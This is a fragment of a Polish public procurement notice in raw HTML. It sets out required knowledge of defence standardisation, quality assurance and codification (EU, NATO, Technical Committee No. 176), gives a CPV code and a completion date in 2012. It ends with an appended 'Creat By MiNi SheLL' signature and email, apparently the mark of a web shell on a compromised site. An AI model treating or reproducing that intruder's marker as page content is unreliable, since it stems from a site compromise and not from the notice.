2. Znajomość obszarów: normalizacji, zapewnienia jakości i kodyfikacji na poziomie krajowym i międzynarodowym (UE i NATO), w tym szczególnie podstaw prawnych funkcjonowania, organizacji działalności i dokumentów regulujących ww. obszary działalności.
3. Uczestnictwo w negocjacjach i zawieraniu umów cywilno-prawnych na prace normalizacyjne,
4.   Znajomość procedury normalizacyjnej w resorcie obrony narodowej, w tym działalności realizowanej w obszarze obronności na szczeblu krajowym przez Komitet Techniczny Nr 176. ds. techniki wojskowej i zaopatrzenia oraz na poziomie resortu obrony narodowej Wojskowego Komitetu Normalizacyjnego..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 79.11.10.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2012.</p></li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com